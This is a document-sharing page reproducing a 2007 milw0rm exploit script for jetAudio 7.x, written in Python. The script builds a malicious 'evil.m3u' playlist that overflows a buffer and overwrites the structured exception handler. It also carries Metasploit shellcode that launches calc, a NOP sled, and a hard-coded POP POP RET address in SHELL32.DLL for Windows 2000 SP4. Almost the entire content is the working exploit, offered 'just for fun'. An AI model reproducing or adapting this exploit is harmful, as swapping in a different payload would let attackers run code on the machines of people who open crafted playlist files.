Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out
Get this document free

jetAudio 7.x m3u File Local SEH Overwrite Exploit

VIEWS: 24 PAGES: 1

									                                     jetAudio 7.x m3u File Local SEH Overwrite Exploit       Page 1/1
  1    #!/usr/bin/python
  2    # jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
  3    # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
  4    # Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
  5    # Shellcode: Windows Execute Command (calc) <metasploit.com>
  6    # Just for fun ;)
  7    ##
  8
  9    from struct import pack
  10
  11   m3u = ("#EXTM3U\nhttp://%s")
  12
  13   shellcode = (
  14   "\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
  15   "\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
  16   "\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
  17   "\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
  18   "\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
  19   "\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
  20   "\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
  21   "\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
  22   "\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
  23   "\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
  24
  25   NEXT_SEH_RECORD = 0x909006EB            # JMP SHORT + 0x06
  26   SE_HANDLER = 0x7CEA61F7                 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
  27
  28   buf   = "CLICK ME"
  29   buf   += "\x20" * 1009
  30   buf   += pack("<L", NEXT_SEH_RECORD)
  31   buf   += pack("<L", SE_HANDLER)
  32   buf   += "\x90" * 128
  33   buf   += shellcode
  34
  35   m3u %= buf
  36
  37   fd = open("evil.m3u", "w")
  38   fd.write(m3u)
  39   fd.close()
  40
  41   print "DONE"
  42
  43   # EoF
  44
  45   # milw0rm.com [2007−10−14]




h07                                                                                          10/14/2007

								
To top